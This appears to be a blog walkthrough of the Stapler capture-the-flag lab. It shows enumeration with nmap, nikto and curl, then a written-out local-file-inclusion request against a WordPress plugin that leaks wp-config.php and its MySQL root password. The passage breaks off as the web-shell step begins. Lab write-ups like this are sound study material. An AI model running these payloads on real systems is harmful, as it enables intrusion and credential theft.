<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sev1on.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Exploitation Guide for StaplerSummaryThis target contains several vulnerabilities, misconfigurations, and oversights, which allow for multiple exploit chains to gain root privileges on the system. In">
<meta property="og:type" content="article">
<meta property="og:title" content="Stapler">
<meta property="og:url" content="https://sev1on.github.io/2022/07/01/Assertion101/index.html">
<meta property="og:site_name" content="Sev1on">
<meta property="og:description" content="Exploitation Guide for StaplerSummaryThis target contains several vulnerabilities, misconfigurations, and oversights, which allow for multiple exploit chains to gain root privileges on the system. In">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-07-01T04:25:00.000Z">
<meta property="article:modified_time" content="2022-07-01T04:25:51.793Z">
<meta property="article:author" content="Swan">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://sev1on.github.io/2022/07/01/Assertion101/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Stapler | Sev1on</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sev1on</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://sev1on.github.io/2022/07/01/Assertion101/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/55.jpg">
      <meta itemprop="name" content="Swan">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sev1on">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Stapler
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-07-01 04:25:00 / Modified: 04:25:51" itemprop="dateCreated datePublished" datetime="2022-07-01T04:25:00+00:00">2022-07-01</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Exploitation-Guide-for-Stapler"><a href="#Exploitation-Guide-for-Stapler" class="headerlink" title="Exploitation Guide for Stapler"></a><strong>Exploitation Guide for Stapler</strong></h1><h2 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a><strong>Summary</strong></h2><p>This target contains several vulnerabilities, misconfigurations, and oversights, which allow for multiple exploit chains to gain root privileges on the system. In this walkthrough, however, we will only consider one such chain for the sake of brevity.</p>
<p>We will exploit the target via a local file inclusion vulnerability in the WordPress plugin <em>Advanced Video v1.0</em>. Using this vulnerability, we’ll be able to leak the WordPress configuration file that contains MySQL database credentials for the application, which will allow us to log in to MySQL. The application was misconfigured to use the MySQL root user, allowing us to write a web shell to the web root of the application.</p>
<p>We’ll be able to escalate our privileges on the target by recovering a user’s plaintext password from a bash history file that was not cleared. The user has unrestricted <code>sudo</code> permissions, granting us easy access to a root shell.</p>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a><strong>Enumeration</strong></h2><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a><strong>Nmap</strong></h3><p>We’ll begin with an <code>nmap</code> scan.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nmap 192.168.120.138</span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 14:14 EDT</span><br><span class="line">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span><br><span class="line">Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>This is interesting. The machine appears to be down, but only because it is blocking ICMP traffic. Regular <code>nmap</code> scans by default include the host discovery step that uses ICMP probes against the target. Let’s follow this with the <code>-Pn</code> scan to work around this inconvenience and skip the host discovery step.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nmap 192.168.120.138 -Pn</span><br><span class="line">...</span><br><span class="line">PORT     STATE  SERVICE</span><br><span class="line">20/tcp   closed ftp-data</span><br><span class="line">21/tcp   open   ftp</span><br><span class="line">22/tcp   open   ssh</span><br><span class="line">53/tcp   open   domain</span><br><span class="line">80/tcp   open   http</span><br><span class="line">139/tcp  open   netbios-ssn</span><br><span class="line">666/tcp  open   doom</span><br><span class="line">3306/tcp open   mysql</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Before proceeding with enumeration, let’s first make sure we’ve discovered all open ports. This scan might take some time depending on our network connection.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nmap -p- 192.168.120.138 -Pn</span><br><span class="line">...</span><br><span class="line">PORT      STATE  SERVICE</span><br><span class="line">20/tcp    closed ftp-data</span><br><span class="line">21/tcp    open   ftp</span><br><span class="line">22/tcp    open   ssh</span><br><span class="line">53/tcp    open   domain</span><br><span class="line">80/tcp    open   http</span><br><span class="line">123/tcp   closed ntp</span><br><span class="line">137/tcp   closed netbios-ns</span><br><span class="line">138/tcp   closed netbios-dgm</span><br><span class="line">139/tcp   open   netbios-ssn</span><br><span class="line">666/tcp   open   doom</span><br><span class="line">3306/tcp  open   mysql</span><br><span class="line">12380/tcp open   unknown</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The scan reveals another service listening on TCP port 12380. We’ll focus on this service and enumerate it further.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ sudo nmap -p 12380 -sC -sV 192.168.120.138 -Pn</span><br><span class="line">...</span><br><span class="line">PORT      STATE SERVICE VERSION</span><br><span class="line">12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br><span class="line">|_http-title: Tim, we need to-do better next year for Initech</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>This appears to be an HTTP service running Apache.</p>
<h3 id="Curl"><a href="#Curl" class="headerlink" title="Curl"></a><strong>Curl</strong></h3><p>If we navigate to the default page (<a target="_blank" rel="noopener" href="http://192.168.120.138:12380/">http://192.168.120.138:12380/</a>), we are presented with a “coming soon” placeholder page.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl http://192.168.120.138:12380/ | html2text</span><br><span class="line">...</span><br><span class="line">****** Coming Soon ******</span><br><span class="line">*** Sorry guys, BSides happened too quick! Didn&#x27;t have enough time to finish</span><br><span class="line">the website. ***</span><br><span class="line">** Try again next year. **</span><br><span class="line">Made with  by Creative_Tim. Free download here.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="Nikto"><a href="#Nikto" class="headerlink" title="Nikto"></a><strong>Nikto</strong></h3><p>Brute-forcing hidden files and directories with a tool like <code>gobuster</code> or <code>dirb</code> does not yield any results even with the largest of wordlists. Next, we’ll turn to <code>nikto</code> in the hope of gleaning more information about the website.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ nikto -h 192.168.120.138:12380</span><br><span class="line">- Nikto v2.1.6</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Target IP:          192.168.120.138</span><br><span class="line">+ Target Hostname:    192.168.120.138</span><br><span class="line">+ Target Port:        12380</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</span><br><span class="line">                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384</span><br><span class="line">                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</span><br><span class="line">+ Start Time:         2021-06-02 14:43:01 (GMT-4)</span><br><span class="line">---------------------------------------------------------------------------</span><br><span class="line">+ Server: Apache/2.4.18 (Ubuntu)</span><br><span class="line">+ The anti-clickjacking X-Frame-Options header is not present.</span><br><span class="line">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</span><br><span class="line">+ Uncommon header &#x27;dave&#x27; found, with contents: Soemthing doesn&#x27;t look right here</span><br><span class="line">+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.</span><br><span class="line">+ The site uses SSL and Expect-CT header is not present.</span><br><span class="line">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</span><br><span class="line">+ No CGI Directories found (use &#x27;-C all&#x27; to force check all possible dirs)</span><br><span class="line">+ Entry &#x27;/admin112233/&#x27; in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br><span class="line">+ Entry &#x27;/blogblog/&#x27; in robots.txt returned a non-forbidden or redirect HTTP code (200)</span><br><span class="line">+ &quot;robots.txt&quot; contains 2 entries which should be manually viewed.</span><br><span class="line">+ Hostname &#x27;192.168.120.138&#x27; does not match certificate&#x27;s names: Red.Initech</span><br><span class="line">+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.</span><br><span class="line">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS</span><br><span class="line">...</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Nikto was able to interact with the <strong>robots.txt</strong> file and discover two interesting directories on the web server: <strong>&#x2F;admin112233&#x2F;</strong> and <strong>&#x2F;blogblog&#x2F;</strong>. We’ll focus on the latter one.</p>
<p>If we try navigating there (<a target="_blank" rel="noopener" href="http://192.168.120.138:12380/blogblog/">http://192.168.120.138:12380/blogblog/</a>), however, we are met with the very same default page.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl http://192.168.120.138:12380/blogblog/ | html2text</span><br><span class="line">...</span><br><span class="line">****** Coming Soon ******</span><br><span class="line">*** Sorry guys, BSides happened too quick! Didn&#x27;t have enough time to finish</span><br><span class="line">the website. ***</span><br><span class="line">** Try again next year. **</span><br><span class="line">Made with  by Creative_Tim. Free download here.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>This is quite odd, but if we look into more information the <code>nikto</code> scan provided us with, we’ll see that the application uses TLS. Navigating to <a target="_blank" rel="noopener" href="https://192.168.120.138:12380/blogblog/">https://192.168.120.138:12380/blogblog/</a> and accepting the self-signed SSL certificate warning, we are presented with a WordPress website.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k https://192.168.120.138:12380/blogblog/ | html2text</span><br><span class="line">...</span><br><span class="line">****** Initech ******</span><br><span class="line">Office Life</span><br><span class="line">    * Home</span><br><span class="line">...</span><br><span class="line">*** Meta ***</span><br><span class="line">    * Register</span><br><span class="line">    * Log_in</span><br><span class="line">    * Entries_RSS</span><br><span class="line">    * Comments_RSS</span><br><span class="line">    * WordPress.org</span><br><span class="line">Proudly_powered_by_WordPress  |  Theme: bhost by BHost_Theme.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="WordPress-Plugin-Enumeration"><a href="#WordPress-Plugin-Enumeration" class="headerlink" title="WordPress Plugin Enumeration"></a><strong>WordPress Plugin Enumeration</strong></h3><p>Navigating to the default plugin directory of WordPress (<strong>&#x2F;wp-content&#x2F;plugins&#x2F;</strong>), we find that the site was misconfigured to allow directory listing here.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/plugins/ | html2text</span><br><span class="line">****** Index of /blogblog/wp-content/plugins ******</span><br><span class="line">[[ICO]]       Name                        Last_modified    Size Description</span><br><span class="line">===========================================================================</span><br><span class="line">[[PARENTDIR]] Parent_Directory                               -</span><br><span class="line">[[DIR]]       advanced-video-embed-embed- 2015-10-14 13:52    -</span><br><span class="line">              videos-or-playlists/</span><br><span class="line">[[   ]]       hello.php                   2016-06-03 23:40 2.2K</span><br><span class="line">[[DIR]]       shortcode-ui/               2015-11-12 17:07    -</span><br><span class="line">[[DIR]]       two-factor/                 2016-04-12 22:56    -</span><br><span class="line">===========================================================================</span><br><span class="line">     Apache/2.4.18 (Ubuntu) Server at 192.168.120.138 Port 12380</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We find three plugins installed: <em>Advanced Video</em>, <em>Shortcode UI</em>, and <em>Two Factor</em>. Clicking on the Advanced Video plugin link shows us the presence of a <strong>readme.txt</strong> file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/ | html2text</span><br><span class="line">****** Index of /blogblog/wp-content/plugins/advanced-video-embed-embed-videos-</span><br><span class="line">or-playlists ******</span><br><span class="line">[[ICO]]       Name                     Last_modified    Size Description</span><br><span class="line">===========================================================================</span><br><span class="line">[[PARENTDIR]] Parent_Directory                            -</span><br><span class="line">[[   ]]       advanced_video_embed.php 2015-10-14 13:52 2.4K</span><br><span class="line">[[DIR]]       inc/                     2015-10-14 13:52    -</span><br><span class="line">[[TXT]]       readme.txt               2015-10-14 13:52 3.1K</span><br><span class="line">===========================================================================</span><br><span class="line">     Apache/2.4.18 (Ubuntu) Server at 192.168.120.138 Port 12380</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s examine this file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt | html2text | head</span><br><span class="line">=== Advanced video embed === Contributors:</span><br><span class="line">arshmultani,meenakshi.php.developer,DScom Donate link: https://www.paypal.com/</span><br><span class="line">cgi-bin/webscr?cmd=_s-xclick&amp;hosted_button_id=Z7C7DNDD9VS3L Tags: advanced</span><br><span class="line">video embed,youtube video embed,auto poster, wordpress youtube playlist</span><br><span class="line">maker,wordpress youtube playlists,wordpress youtube plugin,wordpress youtube</span><br><span class="line">embed,wordpress videos youtube,wordpress youtube video shortcode,wordpress</span><br><span class="line">youtube video as post,video embed , wordpress video embeding plugin, Requires</span><br><span class="line">at least: 3.0.1 Tested up to: 3.3.1 Stable tag: 1.0 Version: 1.0 License: GPLv2</span><br><span class="line">or later License URI: http://www.gnu.org/licenses/gpl-2.0.html Adavnced Video</span><br><span class="line">embed free version supports youtube video embed into your wordpress posts, with</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The top few lines of the file indicate that the plugin version is 1.0.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a><strong>Exploitation</strong></h2><h3 id="WordPress-Plugin-Local-File-Inclusion-Vulnerability"><a href="#WordPress-Plugin-Local-File-Inclusion-Vulnerability" class="headerlink" title="WordPress Plugin Local File Inclusion Vulnerability"></a><strong>WordPress Plugin Local File Inclusion Vulnerability</strong></h3><p>Looking up available exploits for the Advanced Video v1.0 WordPress plugin leads us to this <a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/39646">Local File Inclusion Vulnerability</a>. According to the exploit, the proof-of-concept URL is as follows:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&amp;title=random&amp;short=1&amp;term=1&amp;thumb=[FILEPATH]</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Interpreting the source code of the exploit, we see that it converts the file we chose to read into a JPEG image file and then copies the resulting file to the <strong>&#x2F;wp-content&#x2F;uploads&#x2F;</strong> directory with a random title. For example, if we wanted to read the default WordPress configuration file (<strong>wp-config.php</strong>), the PoC URL would look like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://192.168.120.138:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&amp;title=123456789&amp;short=1&amp;term=1&amp;thumb=../wp-config.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Let’s try to read this file as it usually contains database credentials for the application. First, we’ll make sure there is currently nothing in the <strong>&#x2F;uploads</strong> directory.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/uploads/ | html2text</span><br><span class="line">****** Index of /blogblog/wp-content/uploads ******</span><br><span class="line">[[ICO]]       Name             Last_modified Size Description</span><br><span class="line">===========================================================================</span><br><span class="line">[[PARENTDIR]] Parent_Directory                -</span><br><span class="line">===========================================================================</span><br><span class="line">     Apache/2.4.18 (Ubuntu) Server at 192.168.120.138 Port 12380</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Next, let’s browse to the vulnerable URL.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k &quot;https://192.168.120.138:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&amp;title=123456789&amp;short=1&amp;term=1&amp;thumb=../wp-config.php&quot;</span><br><span class="line">https://192.168.120.138:12380/blogblog/?p=210</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The exploit seems to have worked, and a new blog post was created with the uploaded image containing our file data. We can confirm this by browsing the <strong>&#x2F;uploads</strong> directory again.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/uploads/ | html2text</span><br><span class="line">****** Index of /blogblog/wp-content/uploads ******</span><br><span class="line">[[ICO]]       Name             Last_modified    Size Description</span><br><span class="line">===========================================================================</span><br><span class="line">[[PARENTDIR]] Parent_Directory                   -</span><br><span class="line">[[IMG]]       1994039340.jpeg  2021-06-09 13:22 3.0K</span><br><span class="line">===========================================================================</span><br><span class="line">     Apache/2.4.18 (Ubuntu) Server at 192.168.120.138 Port 12380</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>We see the uploaded JPEG file <strong>1994039340.jpeg</strong> with a random name that was generated by the application. We can now download this file to our attacking machine and view its text contents.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ curl -k -s https://192.168.120.138:12380/blogblog/wp-content/uploads/1994039340.jpeg --output wp-config.php</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~]</span><br><span class="line">└─$ cat wp-config.php</span><br><span class="line">...</span><br><span class="line">// ** MySQL settings - You can get this info from your web host ** //</span><br><span class="line">/** The name of the database for WordPress */</span><br><span class="line">define(&#x27;DB_NAME&#x27;, &#x27;wordpress&#x27;);</span><br><span class="line"></span><br><span class="line">/** MySQL database username */</span><br><span class="line">define(&#x27;DB_USER&#x27;, &#x27;root&#x27;);</span><br><span class="line"></span><br><span class="line">/** MySQL database password */</span><br><span class="line">define(&#x27;DB_PASSWORD&#x27;, &#x27;plbkac&#x27;);</span><br><span class="line"></span><br><span class="line">/** MySQL hostname */</span><br><span class="line">define(&#x27;DB_HOST&#x27;, &#x27;localhost&#x27;);</span><br><span class="line">...</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Nice, the LFI exploit worked and gave us the MySQL database user credentials for the application: <code>root:plbkac</code>. Apparently, the application was misconfigured to use the MySQL root user, which has unlimited database server rights.</p>
<h3 id="Remote-Code-Execution-via-MySQL-Database-File-Write"><a href="#Remote-Code-Execution-via-MySQL-Database-File-Write" class="headerlink" title="Remote Code Execution via MySQL Database File Write"></a><strong>Remote Code Execution via MySQL Database File Write</strong></h3><p>With the credentials recovered, let’s connect to the database. If we don’t already have the <code>mysql</code> client installed on our attacking machine, we can install it as follows.</p>
